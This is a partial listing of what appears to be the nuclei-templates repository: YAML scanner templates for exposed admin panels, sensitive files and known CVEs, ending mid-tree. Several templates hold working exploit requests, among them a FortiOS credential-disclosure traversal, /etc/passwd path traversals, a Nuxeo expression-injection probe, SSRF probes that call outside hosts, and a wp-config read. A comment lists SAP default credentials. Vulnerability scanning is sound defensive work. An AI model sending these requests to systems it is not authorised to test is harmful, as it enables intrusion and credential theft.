├── .gitignore ├── payloads └── CVE-2020-6287.xml ├── .yamllint ├── panels ├── crxde.yaml ├── jmx-console.yaml ├── rabbitmq-dashboard.yaml ├── grafana-detect.yaml ├── mongo-express-web-gui.yaml ├── compal.yaml ├── supervpn-panel.yaml ├── fortinet-fortigate-panel.yaml ├── cisco-asa-panel.yaml ├── globalprotect-panel.yaml ├── parallels-html-client.yaml ├── jenkins-asyncpeople.yaml ├── kubernetes-pods.yaml ├── sap-netweaver-detect.yaml ├── weave-scope-dashboard-detect.yaml ├── tikiwiki-cms.yaml ├── atlassian-crowd-panel.yaml ├── citrix-adc-gateway-detect.yaml ├── pulse-secure-panel.yaml ├── docker-api.yaml ├── sophos-fw-version-detect.yaml ├── phpmyadmin-panel.yaml ├── webeditors.yaml ├── sap-recon-detect.yaml └── swagger-panel.yaml ├── .pre-commit-config.yaml ├── files ├── wp-xmlrpc.yaml ├── debug-pprof.yaml ├── dir-listing.yaml ├── git-config.yaml ├── jkstatus-manager.yaml ├── drupal-install.yaml ├── htaccess-config.yaml ├── lazy-file.yaml ├── telerik-fileupload-detect.yaml ├── laravel-env.yaml ├── firebase-detect.yaml ├── wordpress-user-enumeration.yaml ├── tomcat-scripts.yaml ├── wordpress-directory-listing.yaml ├── web-config.yaml ├── public-tomcat-instance.yaml ├── apc-info.yaml ├── cgi-test-page.yaml ├── docker-registry.yaml ├── elasticsearch.yaml ├── jolokia.yaml ├── security.txt.yaml ├── exposed-kibana.yaml ├── filezilla.yaml ├── exposed-svn.yaml ├── server-status-localhost.yaml ├── telerik-dialoghandler-detect.yaml ├── phpinfo.yaml ├── wadl-files.yaml └── zip-backup-files.yaml ├── technologies ├── sap-netweaver-detect.yaml ├── citrix-vpn-detect.yaml ├── github-enterprise-detect.yaml ├── home-assistant.yaml ├── s3-detect.yaml ├── sql-server-reporting.yaml ├── weblogic-detect.yaml ├── werkzeug-debugger-detect.yaml ├── jira-detect.yaml ├── gitlab-detect.yaml ├── jaspersoft-detect.yaml ├── couchdb-detect.yaml ├── sap-netweaver-as-java-detect.yaml ├── prometheus-exposed-panel.yaml ├── graphql.yaml ├── clockwork-php-page.yaml ├── netsweeper-webadmin-detect.yaml 
├── liferay-portal-detect.yaml ├── bigip-config-utility-detect.yaml ├── linkerd-badrule-detect.yaml ├── ntlm-directories.yaml └── linkerd-ssrf-detect.yaml ├── cves ├── CVE-2019-19781.yaml ├── CVE-2018-13379.yaml ├── CVE-2018-16341.yaml ├── CVE-2017-9506.yaml ├── CVE-2018-14728.yaml ├── CVE-2018-3760.yaml ├── CVE-2018-3714.yaml ├── CVE-2019-18394.yaml ├── CVE-2018-7490.yaml ├── CVE-2019-12314.yaml ├── CVE-2020-2096.yaml ├── CVE-2020-5284.yaml ├── CVE-2018-18069.yaml ├── CVE-2019-19368.yaml ├── CVE-2019-8982.yaml ├── CVE-2018-2791.yaml ├── CVE-2019-3799.yaml ├── CVE-2019-19908.yaml ├── CVE-2019-8903.yaml ├── CVE-2018-11759.yaml ├── CVE-2018-5230.yaml ├── CVE-2019-17382.yaml ├── CVE-2020-3187.yaml ├── CVE-2020-3452.yaml ├── CVE-2020-8115.yaml ├── CVE-2019-19719.yaml ├── CVE-2019-5418.yaml ├── CVE-2018-20824.yaml ├── CVE-2019-14974.yaml ├── CVE-2020-5405.yaml ├── CVE-2018-19439.yaml ├── CVE-2018-1247.yaml ├── CVE-2019-8449.yaml ├── CVE-2020-8091.yaml ├── CVE-2018-11409.yaml ├── CVE-2019-9978.yaml ├── CVE-2020-8982.yaml ├── CVE-2019-11510.yaml ├── CVE-2019-14322.yaml ├── CVE-2018-1000129.yaml ├── CVE-2020-9484.yaml ├── CVE-2020-9757.yaml ├── CVE-2019-19985.yaml ├── CVE-2020-5410.yaml ├── CVE-2019-16759-1.yaml ├── CVE-2019-16278.yaml ├── CVE-2020-8512.yaml ├── CVE-2019-16759.yaml ├── CVE-2019-15043.yaml ├── CVE-2018-0296.yaml ├── CVE-2019-2588.yaml ├── CVE-2018-1271.yaml ├── CVE-2020-10204.yaml ├── CVE-2020-10199.yaml ├── CVE-2017-7529.yaml ├── CVE-2019-3396.yaml ├── CVE-2020-7209.yaml ├── CVE-2020-8194.yaml ├── CVE-2019-20354.yaml ├── CVE-2020-8191.yaml ├── CVE-2020-12720.yaml ├── CVE-2020-1147.yaml ├── CVE-2017-10075.yaml ├── CVE-2017-9841.yaml ├── CVE-2019-10475.yaml ├── CVE-2020-6287.yaml ├── CVE-2019-19743.yaml ├── CVE-2019-8451.yaml ├── CVE-2020-13167.yaml ├── CVE-2020-5902.yaml ├── CVE-2020-8193.yaml └── CVE-2020-7961.yaml ├── workflows ├── liferay-rce-workflow.yaml ├── bigip-pwner-workflow.yaml ├── rabbitmq-workflow.yaml ├── sap-netweaver-workflow.yaml ├── 
netsweeper-preauth-rce-workflow.yaml ├── vbulletin-workflow.yaml ├── springboot-pwner-workflow.yaml ├── wordpress-workflow.yaml └── jira-exploitaiton-workflow.yaml ├── vulnerabilities ├── twig-php-ssti.yaml ├── wordpress-duplicator-path-traversal.yaml ├── oracle-ebs-bispgraph-file-access.yaml ├── rce-shellshock-user-agent.yaml ├── wordpress-wordfence-xss.yaml ├── moodle-filter-jmol-xss.yaml ├── discourse-xss.yaml ├── eclipse-xss.yaml ├── moodle-filter-jmol-lfi.yaml ├── nginx-module-vts-xss.yaml ├── wems-enterprise-xss.yaml ├── x-forwarded-host-injection.yaml ├── cached-aem-pages.yaml ├── ibm-infoprint-directory-traversal.yaml ├── pdf-signer-ssti-to-rce.yaml ├── sick-beard-xss.yaml ├── symfony-debugmode.yaml ├── tikiwiki-reflected-xss.yaml ├── tomcat-manager-pathnormalization.yaml ├── couchdb-adminparty.yaml ├── rce-via-java-deserialization.yaml ├── nscript-web-studios-xss.yaml ├── ssti-jinja2.yaml ├── git-config-nginxoffbyslash.yaml ├── springboot-actuators-jolokia-xxe.yaml ├── microstrategy-ssrf.yaml ├── sql-injection.yaml ├── command-injection.yaml ├── weblogic-servlet-xss.yml ├── open-redirect.yaml ├── local-file-inclusion.yaml └── crlf-injection.yaml ├── dns ├── servfail-refused-hosts.yaml ├── dead-host-with-cname.yaml ├── cname-service-detector.yaml └── azure-takeover-detection.yaml ├── security-misconfiguration ├── jira-unauthenticated-user-picker.yaml ├── basic-cors-flash.yaml ├── basic-cors.yaml ├── jira-unauthenticated-projects.yaml ├── rack-mini-profiler.yaml ├── front-page-misconfig.yaml ├── wamp-xdebug-detect.yaml ├── jira-service-desk-signup.yaml ├── rabbitmq-default-admin.yaml ├── wordpress-accessible-wpconfig.yaml ├── jira-unauthenticated-popular-filters.yaml ├── jira-unauthenticated-dashboards.yaml └── springboot-detect.yaml ├── .github └── workflows │ └── syntax-checking.yml ├── basic-detections ├── basic-xss-prober.yaml └── general-tokens.yaml ├── tokens ├── google-api-key.yaml ├── mailchimp-api-key.yaml ├── aws-access-key-value.yaml ├── 
amazon-mws-auth-token-value.yaml ├── http-username-password.yaml └── slack-access-token.yaml ├── subdomain-takeover ├── s3-subtakeover.yaml └── detect-all-takeovers.yaml ├── LICENSE ├── brute-force └── tomcat-manager-bruteforce.yaml └── README.md /.gitignore: -------------------------------------------------------------------------------- 1 | .DS_Store 2 | local/ 3 | -------------------------------------------------------------------------------- /payloads/CVE-2020-6287.xml: -------------------------------------------------------------------------------- 1 | javaprojectdiscoverproj3ctD1$c0v3ry -------------------------------------------------------------------------------- /.yamllint: -------------------------------------------------------------------------------- 1 | --- 2 | extends: default 3 | 4 | rules: 5 | document-start: disable 6 | line-length: disable 7 | new-lines: disable 8 | new-line-at-end-of-file: disable 9 | truthy: disable 10 | -------------------------------------------------------------------------------- /panels/crxde.yaml: -------------------------------------------------------------------------------- 1 | id: crxde 2 | 3 | info: 4 | name: CRXDE Lite 5 | author: nadino 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/crx/de/index.jsp" 12 | matchers: 13 | - type: word 14 | words: 15 | - "CRXDE Lite" 16 | -------------------------------------------------------------------------------- /.pre-commit-config.yaml: -------------------------------------------------------------------------------- 1 | repos: 2 | - repo: https://github.com/pre-commit/pre-commit-hooks 3 | rev: v2.3.0 4 | hooks: 5 | - id: end-of-file-fixer 6 | - id: trailing-whitespace 7 | - repo: https://github.com/adrienverge/yamllint.git 8 | rev: v1.17.0 9 | hooks: 10 | - id: yamllint 11 | -------------------------------------------------------------------------------- /files/wp-xmlrpc.yaml: 
-------------------------------------------------------------------------------- 1 | id: wordpress-xmlrpc-file 2 | 3 | info: 4 | name: WordPress xmlrpc 5 | author: udit_thakkur 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/xmlrpc.php" 12 | matchers: 13 | - type: status 14 | status: 15 | - 405 16 | -------------------------------------------------------------------------------- /files/debug-pprof.yaml: -------------------------------------------------------------------------------- 1 | id: debug-pprof 2 | 3 | info: 4 | name: pprof debug file 5 | author: pdteam 6 | severity: low 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/debug/pprof/" 12 | matchers: 13 | - type: word 14 | words: 15 | - "Types of profiles available" 16 | -------------------------------------------------------------------------------- /panels/jmx-console.yaml: -------------------------------------------------------------------------------- 1 | id: jmx-console 2 | info: 3 | name: JMX Console 4 | author: Yash Anand @yashanand155 5 | severity: Low 6 | requests: 7 | - method: GET 8 | path: 9 | - '{{BaseURL}}/jmx-console/' 10 | matchers: 11 | - type: word 12 | words: 13 | - JBoss JMX Management Console 14 | -------------------------------------------------------------------------------- /technologies/sap-netweaver-detect.yaml: -------------------------------------------------------------------------------- 1 | id: SAP-Netweaver-Detect 2 | info: 3 | name: SAP NetWeaver Detect 4 | author: rakeshmane10 5 | severity: info 6 | requests: 7 | - method: GET 8 | path: 9 | - '{{BaseURL}}/irj/portal' 10 | matchers: 11 | - type: word 12 | words: 13 | - NetWeaver 14 | -------------------------------------------------------------------------------- /cves/CVE-2019-19781.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2019-19781 2 | 3 | info: 4 | name: Citrix ADC Directory Traversal 5 | author: organiccrap 6 | 
severity: high 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/vpn/../vpns/cfg/smb.conf" 12 | matchers: 13 | - type: word 14 | words: 15 | - "[global]" 16 | -------------------------------------------------------------------------------- /panels/rabbitmq-dashboard.yaml: -------------------------------------------------------------------------------- 1 | id: rabbitmq-dashboard 2 | 3 | info: 4 | name: RabbitMQ Dashboard 5 | author: fyoorer 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - '{{BaseURL}}' 12 | matchers: 13 | - type: word 14 | words: 15 | - "RabbitMQ Management" 16 | part: body 17 | -------------------------------------------------------------------------------- /files/dir-listing.yaml: -------------------------------------------------------------------------------- 1 | id: dir-listing 2 | 3 | info: 4 | name: Directory listing enabled 5 | author: _harleo 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/" 12 | matchers: 13 | - type: word 14 | words: 15 | - "Index of /" 16 | - "[To Parent Directory]" 17 | -------------------------------------------------------------------------------- /panels/grafana-detect.yaml: -------------------------------------------------------------------------------- 1 | id: grafana-detect 2 | 3 | info: 4 | name: Grafana panel detect 5 | author: organiccrap 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/login" 12 | matchers: 13 | - type: word 14 | words: 15 | - "Grafana" 16 | part: body 17 | -------------------------------------------------------------------------------- /technologies/citrix-vpn-detect.yaml: -------------------------------------------------------------------------------- 1 | id: citrix-vpn-detect 2 | 3 | info: 4 | name: Citrix VPN Detection 5 | author: bauthard 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/vpn/index.html" 12 | matchers: 13 | - type: word 14 | 
words: 15 | - "Citrix Gateway" 16 | -------------------------------------------------------------------------------- /technologies/github-enterprise-detect.yaml: -------------------------------------------------------------------------------- 1 | id: Github-Enterprise-Detect 2 | 3 | info: 4 | name: Detect Github Enterprise 5 | author: ehsahil 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/login" 12 | matchers: 13 | - type: word 14 | words: 15 | - "GitHub · Enterprise" 16 | -------------------------------------------------------------------------------- /workflows/liferay-rce-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: liferay-rce-workflow 2 | 3 | info: 4 | name: Liferay RCE Workflow 5 | author: dwisiswant0 6 | 7 | variables: 8 | liferay_portal: technologies/liferay-portal-detect.yaml 9 | liferay_portal_cve: cves/CVE-2020-7961.yaml 10 | 11 | logic: 12 | | 13 | if liferay_portal() { 14 | liferay_portal_cve() 15 | } 16 | -------------------------------------------------------------------------------- /technologies/home-assistant.yaml: -------------------------------------------------------------------------------- 1 | id: home-assistant 2 | 3 | info: 4 | name: Detect Home Assistant 5 | author: fabaff 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}:8123/" 12 | - "{{BaseURL}}/" 13 | matchers: 14 | - type: word 15 | words: 16 | - "Home Assistant" 17 | -------------------------------------------------------------------------------- /panels/mongo-express-web-gui.yaml: -------------------------------------------------------------------------------- 1 | id: mongo-express-web-gui 2 | 3 | info: 4 | name: Mongo Express Web GUI 5 | author: puzzlepeaches 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/" 12 | matchers: 13 | - type: word 14 | words: 15 | - "Set-Cookie: mongo-express=" 16 | part: header 17 | 
-------------------------------------------------------------------------------- /technologies/s3-detect.yaml: -------------------------------------------------------------------------------- 1 | id: s3-detect 2 | 3 | info: 4 | name: Detect Amazon-S3 Bucket 5 | author: melbadry9 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/%c0" 12 | matchers: 13 | - type: regex 14 | regex: 15 | - "(?:InvalidURI|InvalidArgument|NoSuchBucket)" 16 | part: body 17 | -------------------------------------------------------------------------------- /panels/compal.yaml: -------------------------------------------------------------------------------- 1 | id: compal-panel-detect 2 | 3 | info: 4 | name: Compal CH7465LG panel detect 5 | author: fabaff 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/common_page/login.html" 12 | matchers: 13 | - type: word 14 | words: 15 | - "" 16 | part: body 17 | -------------------------------------------------------------------------------- /panels/supervpn-panel.yaml: -------------------------------------------------------------------------------- 1 | id: supervpn-detect 2 | 3 | info: 4 | name: SuperVPN panel detect 5 | author: organiccrap 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/admin/login.html" 12 | matchers: 13 | - type: word 14 | words: 15 | - "Sign In-SuperVPN" 16 | part: body 17 | -------------------------------------------------------------------------------- /panels/fortinet-fortigate-panel.yaml: -------------------------------------------------------------------------------- 1 | id: fortinet-fortigate-panel 2 | 3 | info: 4 | name: Fortinet FortiGate SSL VPN Panel 5 | author: bsysop 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/remote/login" 12 | matchers: 13 | - type: word 14 | words: 15 | - "/remote/fgt_lang" 16 | part: body 17 | 
-------------------------------------------------------------------------------- /technologies/sql-server-reporting.yaml: -------------------------------------------------------------------------------- 1 | id: sql-server-reporting 2 | 3 | info: 4 | name: Detect Microsoft SQL Server Reporting 5 | author: puzzlepeaches 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/Reports/Pages/Folder.aspx" 12 | matchers: 13 | - type: word 14 | words: 15 | - "Report Manager" 16 | -------------------------------------------------------------------------------- /workflows/bigip-pwner-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: bigip-pwner-workflow 2 | 3 | info: 4 | name: F5 BIG-IP RCE Workflow 5 | author: dwisiswant0 6 | 7 | variables: 8 | bigip_config_utility: technologies/bigip-config-utility-detect.yaml 9 | bigip_cve_2020_5902: cves/CVE-2020-5902.yaml 10 | 11 | logic: 12 | | 13 | if bigip_config_utility() { 14 | bigip_cve_2020_5902() 15 | } 16 | -------------------------------------------------------------------------------- /files/git-config.yaml: -------------------------------------------------------------------------------- 1 | id: git-config 2 | 3 | info: 4 | name: Git Config Disclosure 5 | author: Ice3man 6 | severity: medium 7 | description: Searches for the pattern /.git/config on passed URLs. 
8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/.git/config" 13 | matchers: 14 | - type: word 15 | words: 16 | - "[core]" 17 | -------------------------------------------------------------------------------- /vulnerabilities/twig-php-ssti.yaml: -------------------------------------------------------------------------------- 1 | id: twig-php-ssti 2 | 3 | info: 4 | name: Twig PHP <2.4.4 template engine - SSTI 5 | author: madrobot 6 | severity: high 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/search?search_key={{1337*1338}}" 12 | matchers: 13 | - type: word 14 | words: 15 | - "1788906" 16 | part: body 17 | -------------------------------------------------------------------------------- /workflows/rabbitmq-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: rabbitmq-workflow 2 | 3 | info: 4 | name: RabbitMQ Workflow 5 | author: fyoorer 6 | 7 | variables: 8 | rabbitmq_dashboard: panels/rabbitmq-dashboard.yaml 9 | rabbitmq_default_admin: security-misconfiguration/rabbitmq-default-admin.yaml 10 | 11 | logic: 12 | | 13 | if rabbitmq_dashboard() { 14 | rabbitmq_default_admin() 15 | } 16 | -------------------------------------------------------------------------------- /dns/servfail-refused-hosts.yaml: -------------------------------------------------------------------------------- 1 | id: servfail-refused-hosts 2 | 3 | info: 4 | name: Servfail Host Finder 5 | author: mzack9999 6 | severity: info 7 | 8 | dns: 9 | - name: "{{FQDN}}" 10 | type: A 11 | class: inet 12 | recursion: true 13 | retries: 3 14 | matchers: 15 | - type: word 16 | words: 17 | - "SERVFAIL" 18 | - "REFUSED" 19 | -------------------------------------------------------------------------------- /panels/cisco-asa-panel.yaml: -------------------------------------------------------------------------------- 1 | id: cisco-asa-panel-detect 2 | 3 | info: 4 | name: Cisco ASA VPN panel detect 5 | author: organiccrap 6 | 
severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/+CSCOE+/logon.html" 12 | matchers: 13 | - type: word 14 | words: 15 | - "SSL VPN Service" 16 | part: body 17 | -------------------------------------------------------------------------------- /panels/globalprotect-panel.yaml: -------------------------------------------------------------------------------- 1 | id: globalprotect-panel 2 | 3 | info: 4 | name: PaloAlto Networks GlobalProtect Panel 5 | author: organiccrap 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/global-protect/login.esp" 12 | matchers: 13 | - type: word 14 | words: 15 | - "GlobalProtect Portal" 16 | -------------------------------------------------------------------------------- /cves/CVE-2018-13379.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2018-13379 2 | 3 | info: 4 | name: FortiOS - Credentials Disclosure 5 | author: organiccrap 6 | severity: high 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession" 12 | matchers: 13 | - type: word 14 | words: 15 | - "var fgt_lang =" 16 | -------------------------------------------------------------------------------- /panels/parallels-html-client.yaml: -------------------------------------------------------------------------------- 1 | id: parallels-html-client 2 | 3 | info: 4 | name: Parallels HTML5 Client 5 | author: bauthard 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/RASHTML5Gateway/" 12 | matchers: 13 | - type: word 14 | words: 15 | - "Parallels HTML5 Client" 16 | part: body 17 | -------------------------------------------------------------------------------- /technologies/weblogic-detect.yaml: -------------------------------------------------------------------------------- 1 | id: WebLogic-Detect 2 | 3 | info: 4 | name: Detect Weblogic 5 | author: bing0o 6 
| severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}:7001/console/login/LoginForm.jsp" 12 | - "{{BaseURL}}/console/login/LoginForm.jsp" 13 | matchers: 14 | - type: word 15 | words: 16 | - "WebLogic" 17 | -------------------------------------------------------------------------------- /files/jkstatus-manager.yaml: -------------------------------------------------------------------------------- 1 | id: jkstatus-manager 2 | 3 | info: 4 | name: JK Status Manager 5 | author: bauthard 6 | severity: low 7 | 8 | requests: 9 | - method: GET 10 | headers: 11 | X-Forwarded-For: "127.0.0.1" 12 | path: 13 | - "{{BaseURL}}/jkstatus/" 14 | matchers: 15 | - type: word 16 | words: 17 | - "JK Status Manager" 18 | -------------------------------------------------------------------------------- /panels/jenkins-asyncpeople.yaml: -------------------------------------------------------------------------------- 1 | id: jenkins-async-people 2 | 3 | info: 4 | name: Jenkins panel async-people 5 | author: nadino 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/asynchPeople/" 12 | matchers: 13 | - type: word 14 | words: 15 | - "People - [Jenkins]" 16 | part: body 17 | -------------------------------------------------------------------------------- /cves/CVE-2018-16341.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2018-16341 2 | 3 | info: 4 | name: Nuxeo Authentication Bypass Remote Code Execution 5 | author: madrobot 6 | severity: high 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/nuxeo/login.jsp/pwn${31333333330+7}.xhtml" 12 | matchers: 13 | - type: word 14 | words: 15 | - "31333333337" 16 | part: body 17 | -------------------------------------------------------------------------------- /files/drupal-install.yaml: -------------------------------------------------------------------------------- 1 | id: drupal-install 2 | 3 | info: 4 | name: Drupal 
Install 5 | author: NkxxkN 6 | severity: low 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/install.php?profile=default" 12 | redirects: true 13 | max-redirects: 1 14 | matchers: 15 | - type: word 16 | words: 17 | - "Choose language | Drupal" 18 | -------------------------------------------------------------------------------- /workflows/sap-netweaver-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: sap-netweaver-workflow 2 | 3 | info: 4 | name: SAP NetWeaver Workflow 5 | author: dwisiswant0 6 | 7 | variables: 8 | sap_netweaver_as_java: technologies/sap-netweaver-as-java-detect.yaml 9 | sap_netweaver_as_java_cve_1: cves/CVE-2020-6287.yaml 10 | 11 | logic: 12 | | 13 | if sap_netweaver_as_java() { 14 | sap_netweaver_as_java_cve_1() 15 | } 16 | -------------------------------------------------------------------------------- /technologies/werkzeug-debugger-detect.yaml: -------------------------------------------------------------------------------- 1 | id: werkzeug-debugger-detect 2 | 3 | info: 4 | name: Werkzeug debugger console 5 | author: pdnuclei - projectdiscovery.io 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/console" 12 | matchers: 13 | - type: word 14 | words: 15 | - "

Interactive Console

" 16 | part: body 17 | -------------------------------------------------------------------------------- /cves/CVE-2017-9506.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2017-9506 2 | 3 | info: 4 | name: Jira IconURIServlet SSRF 5 | author: Ice3man 6 | severity: high 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/plugins/servlet/oauth/users/icon-uri?consumerUri=https://ipinfo.io/json" 12 | matchers: 13 | - type: word 14 | words: 15 | - "ipinfo.io/missingauth" 16 | part: body 17 | -------------------------------------------------------------------------------- /files/htaccess-config.yaml: -------------------------------------------------------------------------------- 1 | id: htaccess-config 2 | 3 | info: 4 | name: HTaccess config file 5 | author: Yash Anand @yashanand155 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/.htaccess" 12 | matchers: 13 | - type: word 14 | words: 15 | - RewriteRule 16 | - 17 | - " 19 | -------------------------------------------------------------------------------- /files/firebase-detect.yaml: -------------------------------------------------------------------------------- 1 | id: firebase-detect 2 | 3 | info: 4 | name: firebase detect 5 | author: organiccrap 6 | severity: low 7 | # http://ghostlulz.com/google-exposed-firebase-database/ 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/.settings/rules.json?auth=FIREBASE_SECRET" 13 | matchers: 14 | - type: word 15 | words: 16 | - "Could not parse auth token" 17 | part: body 18 | -------------------------------------------------------------------------------- /files/wordpress-user-enumeration.yaml: -------------------------------------------------------------------------------- 1 | id: wordpress-user-enumeration 2 | 3 | info: 4 | name: Wordpress user enumeration 5 | author: Manas_Harsh 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - 
"{{BaseURL}}/wp-json/wp/v2/users/" 12 | matchers-condition: and 13 | matchers: 14 | - type: status 15 | status: 16 | - 200 17 | - type: word 18 | words: 19 | - avatar_urls 20 | -------------------------------------------------------------------------------- /cves/CVE-2018-3760.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2018-3760 2 | 3 | info: 4 | name: Rails cve-2018-3760 5 | author: 0xrudra 6 | severity: high 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/assets/file:%2f%2f/etc/passwd" 12 | matchers-condition: and 13 | matchers: 14 | - type: status 15 | status: 16 | - 200 17 | - type: regex 18 | regex: 19 | - "root:[x*]:0:0:" 20 | part: body 21 | -------------------------------------------------------------------------------- /files/tomcat-scripts.yaml: -------------------------------------------------------------------------------- 1 | id: tomcat-scripts 2 | 3 | info: 4 | name: Detect Tomcat Exposed Scripts 5 | author: Co0nan 6 | severity: low 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/examples/servlets/index.html" 12 | - "{{BaseURL}}/examples/jsp/index.html" 13 | matchers: 14 | - type: word 15 | words: 16 | - "JSP Examples" 17 | - "JSP Samples" 18 | - "Servlets Examples" 19 | -------------------------------------------------------------------------------- /technologies/gitlab-detect.yaml: -------------------------------------------------------------------------------- 1 | id: Gitlab-Detect 2 | 3 | info: 4 | name: Detect Gitlab 5 | author: ehsahil 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/users/sign_in" 12 | - "{{BaseURL}}/users/sign_up" 13 | - "{{BaseURL}}/explore" 14 | matchers: 15 | - type: word 16 | words: 17 | - "GitLab" 18 | - "Register for GitLab" 19 | - "Explore GitLab" 20 | -------------------------------------------------------------------------------- /cves/CVE-2018-3714.yaml: 
-------------------------------------------------------------------------------- 1 | id: CVE-2018-3714 2 | info: 3 | name: node-srv Path Traversal 4 | author: madrobot 5 | severity: high 6 | 7 | requests: 8 | - method: GET 9 | path: 10 | - "{{BaseURL}}/node_modules/../../../../../etc/passwd" 11 | matchers-condition: and 12 | matchers: 13 | - type: status 14 | status: 15 | - 200 16 | - type: regex 17 | regex: 18 | - "root:[x*]:0:0:" 19 | part: body 20 | -------------------------------------------------------------------------------- /cves/CVE-2019-18394.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2019-18394 2 | 3 | info: 4 | name: Openfire Full Read SSRF 5 | author: pdteam - nuclei.projectdiscovery.io 6 | severity: critical 7 | 8 | # Source:- https://swarm.ptsecurity.com/openfire-admin-console/ 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/getFavicon?host=burpcollaborator.net" 14 | matchers: 15 | - type: word 16 | words: 17 | -

Burp Collaborator Server

-------------------------------------------------------------------------------- /security-misconfiguration/basic-cors.yaml: -------------------------------------------------------------------------------- 1 | id: basic-cors-misconfig 2 | 3 | info: 4 | name: Basic CORS misconfiguration 5 | author: nadino 6 | severity: medium 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}" 12 | headers: 13 | Origin: "https://evil.com" 14 | matchers: 15 | - type: word 16 | words: 17 | - "Access-Control-Allow-Origin: https://evil.com" 18 | part: header 19 | -------------------------------------------------------------------------------- /vulnerabilities/wordpress-duplicator-path-traversal.yaml: -------------------------------------------------------------------------------- 1 | id: wordpress-duplicator-path-traversal 2 | 3 | info: 4 | name: WordPress duplicator Path Traversal 5 | author: madrobot 6 | severity: high 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/wp-admin/admin-ajax.php?action=duplicator_download&file=/../wp-config.php" 12 | matchers: 13 | - type: word 14 | words: 15 | - "DB_NAME" 16 | part: body 17 | -------------------------------------------------------------------------------- /files/wordpress-directory-listing.yaml: -------------------------------------------------------------------------------- 1 | id: wordpress-directory-listing 2 | 3 | info: 4 | name: Wordpress directory listing 5 | author: Manas_Harsh 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/wp-content/uploads/" 12 | matchers-condition: and 13 | matchers: 14 | - type: status 15 | status: 16 | - 200 17 | - type: word 18 | words: 19 | - Index of /wp-content/uploads 20 | -------------------------------------------------------------------------------- /panels/kubernetes-pods.yaml: -------------------------------------------------------------------------------- 1 | id: kubernetes-pods-api 2 | info: 3 | name: Kubernetes Pods API 4 | 
author: ilovebinbash 5 | severity: info 6 | requests: 7 | - method: GET 8 | path: 9 | - '{{BaseURL}}:10250/pods' 10 | matchers-condition: and 11 | matchers: 12 | - type: word 13 | words: 14 | - "apiVersion" 15 | part: body 16 | - type: word 17 | words: 18 | - "application/json" 19 | part: header 20 | -------------------------------------------------------------------------------- /panels/sap-netweaver-detect.yaml: -------------------------------------------------------------------------------- 1 | id: sap-netweaver-portal-detect 2 | 3 | info: 4 | name: SAP NetWeaver Portal detect 5 | author: organiccrap 6 | severity: info 7 | # SAP Netweaver default creds - SAP*/06071992 or TMSADM/$1Pawd2& 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/irj/portal" 13 | matchers: 14 | - type: word 15 | words: 16 | - "SAP NetWeaver Portal" 17 | part: body 18 | -------------------------------------------------------------------------------- /vulnerabilities/oracle-ebs-bispgraph-file-access.yaml: 